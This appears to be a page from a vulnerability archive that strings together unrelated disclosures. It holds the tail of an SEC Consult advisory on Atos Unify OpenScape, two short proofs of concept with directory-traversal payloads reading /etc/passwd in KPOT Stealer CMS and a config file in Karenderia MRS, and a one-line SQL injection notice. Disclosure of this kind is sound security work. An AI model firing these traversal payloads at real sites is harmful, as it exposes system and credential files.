[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 839  
[...] ---------- Done start() OSS       ----------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 840  
[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 841  
[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 842  
[...] --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 77  
[...] ---------- Done start.php (0) --------- in /srv/www/htdocs/core/scripts/start.php on line 78  
[...] --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 79  
[...]  
-----------------------------------------------------------------------

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* OpenScape Session Border Controller Firmware Version V10 R3.01.03

According to vendor, versions before V10 R3.3.0 are affected as well.

The vendor confirmed that the following other products are vulnerable as well:  
* OpenScape Branch version before V10 R3.3.0  
* OpenScape BCF version before V10 R10.10.0

Vendor contact timeline:  
------------------------  
2023-06-12: Contacting vendor through email obso@atos.net; sending  
             encrypted advisory (S/MIME)  
2023-06-15: Call with vendor, discussing release and timeline.  
             Requesting CVE numbers through MITRE.  
2023-06-28: Vendor provides update regarding timeline / patch availability and  
             affected products.  
             Sending received CVE numbers to vendor.  
2023-06-29: Vendor provides draft of their security advisory including  
             planned release dates of patched versions. Giving feedback.  
             Receiving download URL from vendor.  
2023-07-04: Receiving updated version of vendor security advisory,  
             providing some more feedback/minor fixes.  
2023-07-06: Vendor releases security advisory and patches.  
2023-09-18: Coordinated release of advisory

Solution:  
---------  
The vendor provides a patch for the affected products:  
* OpenScape Session Border Controller Firmware Version V10 >=R3.3.0  
* OpenScape Branch version V10 >=R3.3.0  
* OpenScape BCF version V10 >=R10.10.0

The patches can be obtained for registered customers through the vendor's  
download server:  
https://sws.unify.com/SWSIntranet/SWSIntra.aspx or via  
https://unify.com/en/partner/partnerportal  
https://unify.com/en/support/kunden-support-portal

Furthermore, the vendor has also released a security advisory which is  
available here:  
https://networks.unify.com/security/advisories/OBSO-2307-01.pdf

Workaround:  
-----------  
Limit access to the administrative web application to authorized personnel  
on the network level.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF A. Weihbold / @2023

Atos Unify OpenScape Code Execution / Missing Authentication

KPOT Stealer CMS 2.0 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : KPOT Stealer CMS v2.0 Directory Traversal Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md                       |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] onfected file: download.php   <?php     if (isset($_GET['file']))     {     $file = $_GET['file'];     header('Content-Disposition: attachment; filename="'.basename($file).'"');     header('Content-Length: ' . filesize($file));     readfile($file);   }   ?>[+] use payload : download.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/KPOT/download.php?file=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

KPOT Stealer CMS 2.0 Directory Traversal

Karenderia MRS version 5.3 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Karenderia MRS v5.3 Directory Traversal Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(64-bit)                                               | | # Vendor    : https://github.com/ashishvazirani/food                                                                             |  | # Dork      : 1149 N GOWER ST, 90038 United States Call Us 111111111                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /exportmanager/ajax/getfiles?f=/../../protected/config/main.php[+] http://127.0.0.1Trgtbastisapp.com/kmrs/exportmanager/ajax/getfiles?f=/../../protected/config/main.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Karenderia MRS 5.3 Directory Traversal

SQL injection vulnerability in Exam Form Submission in PHP with Source Code v.1.0 allows a remote attacker to escalate privileges via the val-username parameter in /index.php.

Tag

#php